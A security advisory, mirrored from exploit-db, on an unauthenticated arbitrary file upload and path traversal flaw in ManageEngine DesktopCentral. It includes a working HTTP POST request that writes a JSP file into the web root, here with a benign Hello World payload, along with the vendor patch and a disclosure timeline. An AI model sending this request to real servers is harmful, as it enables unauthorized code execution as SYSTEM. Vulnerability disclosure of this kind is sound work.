bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/jsp/webapps/29674.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

84 lines
No EOL
2.7 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

( , ) (,
. `.' ) ('. ',
). , ('. ( ) (
(_,) .`), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_='`"``=.
presents..
DesktopCentral Arbitrary File Upload Vulnerability
Affected versions: DesktopCentral versions < 80293
PDF: http://security-assessment.com/files/documents/advisory/DesktopCentral%20Arbitrary%20File%20Upload.pdf
+-----------+
|Description|
+-----------+
ManageEngine DesktopCentral 8.0.0 build 80293 and below suffer from an arbitrary file upload vulnerability that can be
leveraged to gain arbitrary code execution on the server. The code run on the server in this fashion will execute as
NT-AUTHORITY\SYSTEM.
The problem exists in the AgentLogUploadServlet. This servlet takes input from HTTP POST and constructs an output file
on the server without performing any sanitisation or even checking if the caller is authenticated. Due to the way the
path is constructed it is possible to traverse to the application web root and create a script file that will be
executed when called from a web browser.
+------------+
|Exploitation|
+------------+
POST/agentLogUploader?computerName=DesktopCentral&domainName=webapps&
customerId=..&filename=test.jsp HTTP/1.1
Host: <desktopcentral>:8020
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: keep-alive
Content-Type: text/html;
Content-Length: 109
<HTML>
<HEAD>
<TITLE>Hello World</TITLE>
</HEAD>
<BODY>
<H1>Hello World</H1>
</BODY>
</HTML>
+----------+
| Solution |
+----------+
Apply the patch supplied by the vendor (Patch 80293)
+-------------------+
|Disclosure Timeline|
+-------------------+
20/10/2013 Vulnerability discovered, vendor notified.
25/10/2013 Vendor acknowledges issue
30/10/2013 - Vendor issues Patch 80293 that fixes the issue
09/11/2013 Exploit demonstrated at Kiwicon 7
18/11/2013 Advisory released.
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is a New Zealand based world
leader in web application testing, network security
and penetration testing. Security-Assessment.com
services organisations across New Zealand, Australia,
Asia Pacific, the United States and the United
Kingdom.
Security-Assessment.com is currently looking for skilled penetration
testers. If you are interested, please email 'hr at security-assessment.com'
Reference in a new issue View git blame Copy permalink